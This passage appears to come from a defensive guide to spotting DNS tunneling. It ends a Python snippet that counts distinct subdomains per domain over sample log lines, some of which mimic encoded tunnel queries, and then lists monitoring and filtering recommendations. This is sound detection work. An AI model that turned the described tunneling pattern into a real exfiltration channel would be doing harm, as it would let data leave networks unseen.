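    "t1\t10.0.0.5\t2d965f52.0001.REVG.textsip.com\t1",
    "t2\t10.0.0.5\t2d965f52.0001.REVG.textsip.com\t1",   # retransmission
    "t3\t10.0.0.7\twww.example.com\t1",
]
for parent, names in sorted(unique_subdomains(sample).items()):
    print(parent, len(names))
```

For a real capture, pass an open file handle for dns_capture.log instead of the sample list. A domain with hundreds of distinct names from a single client is worth a closer look.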

Defensive Recommendations

  1. Monitor DNS query patterns: alert on high volume, high entropy, or unusual TXT queries to a single domain
  2. Deploy DNS logging: capture all queries at the resolver level (CoreDNS, Unbound, or a passive DNS tap)
  3. Use DNS filtering: block queries to uncategorized or newly registered domains
  4. Inspect TXT records: legitimate TXT records are typically SPF, DKIM, or DMARC; random data in TXT is suspicious
  5. Rate limit DNS: cap queries per source IP per domain per minute
  6. Network segmentation: workloads that don't need DNS (or only need specific domains) should have restricted egress